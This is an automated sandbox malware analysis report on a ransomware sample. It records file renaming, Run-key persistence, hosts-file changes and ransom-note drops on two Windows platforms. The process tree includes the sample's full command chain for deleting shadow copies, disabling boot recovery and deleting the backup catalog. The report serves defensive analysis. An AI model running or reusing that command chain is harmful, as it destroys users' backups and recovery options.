Malware Analysis Report

2025-08-05 15:06

Sample ID 250519-r8gkpazmv6
Target 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry
SHA256 c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
Tags
defense_evasion discovery execution impact persistence ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

Threat Level: Likely malicious

The file 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution impact persistence ransomware

Renames multiple (66) files with added filename extension

Deletes shadow copies

Renames multiple (67) files with added filename extension

Drops file in Drivers directory

Executes dropped EXE

Checks computer location settings

Drops desktop.ini file(s)

Adds Run key to start application

Drops file in System32 directory

Sets desktop wallpaper using registry

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Opens file in notepad (likely ransom note)

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-19 14:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 14:51

Reported

2025-05-19 14:54

Platform

win10v2004-20250502-en

Max time kernel

131s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (67) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\discord.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\discord.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\discord.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg" C:\Users\Admin\AppData\Local\discord.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageJYnansNC=fMcPGKpJKetnruH=HVMRU.jpg" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\discord.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\discord.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\discord.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network


Files

C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Roaming\ID

C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

C:\Users\Admin\Pictures\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg

C:\Windows\System32\drivers\etc\hosts

C:\Users\Admin\Downloads\APEXNOTE.txt

C:\Users\Admin\AppData\Roaming\usb_maker.bat

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-19 14:51

Reported

2025-05-19 14:54

Platform

win11-20250502-en

Max time kernel

102s

Max time network

106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (66) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\discord.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\discord.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageUPJZGTwowpsC=msANo=OEVvYUjoFTu.jpg" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\discord.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\discord.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
